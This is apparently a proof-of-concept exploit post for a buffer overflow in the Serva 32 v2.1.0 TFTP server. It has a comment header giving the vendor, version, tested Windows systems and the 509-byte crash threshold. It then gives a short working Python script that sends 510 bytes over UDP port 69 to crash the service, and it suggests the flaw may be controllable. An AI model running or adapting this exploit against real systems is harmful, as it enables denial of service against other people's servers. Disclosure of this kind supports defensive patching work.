#Serva 32 TFTP Buffer overflow DoS # #05/14/2013 #Sapling #Vendor homepage http://www.vercot.com/ #Software Link: #http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip #Version 2.1.0 Only prior versions are not vulnerable #Tested on Windows 8, Windows 7, Windows XP SP1-3 #CVE to be established today or tomorrow. # #This is the serva 32 Proof Of Concept exploit discovered and written by Sapling. At this #time the exploit is only a denial of service but evidence show it may be controllable. #The difficulty with controlling it at this point was the failure to overwrite the SEH #chains or bypass them. The crash occurs when sending a message longer than 509 bytes long
#start of python file import sys import socket
new = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) new.connect(('192.168.1.19', 69)) new.send('\x41'*510) #end of python file
|